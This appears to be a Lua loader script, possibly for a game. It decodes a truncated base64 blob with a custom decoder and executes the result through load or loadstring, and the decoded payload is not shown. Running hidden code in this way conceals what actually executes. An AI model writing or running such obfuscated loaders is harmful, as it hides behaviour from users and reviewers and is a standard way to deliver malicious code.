
local _a = [[LS0tIEtleWJpbmQgaXMgImNvbW1hIiAiICwgIg0KDQotLSBtYWRlIGJ5IHZleHn...REDACTED_FOR_DISPLAY...]]



local function _b(s)
    local b='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
    s = string.gsub(s, '[^'..b..'=]', '')
    return (s:gsub('.', function(x)
        if x == '=' then return '' end
        local r,f = '', (b:find(x)-1)
        for i=6,1,-1 do r = r .. (math.floor(f/2^(i-1))%2) end
        return r
    end):gsub('%d%d%d%d%d%d%d%d', function(x)
        local c=0
        for i=1,8 do c=c*2 + (x:sub(i,i) == '1' and 1 or 0) end
        return string.char(c)
    end))
end


local function _c(t)
    local f = (load or loadstring)
    if not f then error("no loader") end
    local ok,err = pcall(function() f(t)() end)
    if not ok then error(err) end
end

-- run
local _d = _b(_a)
_c(_d)
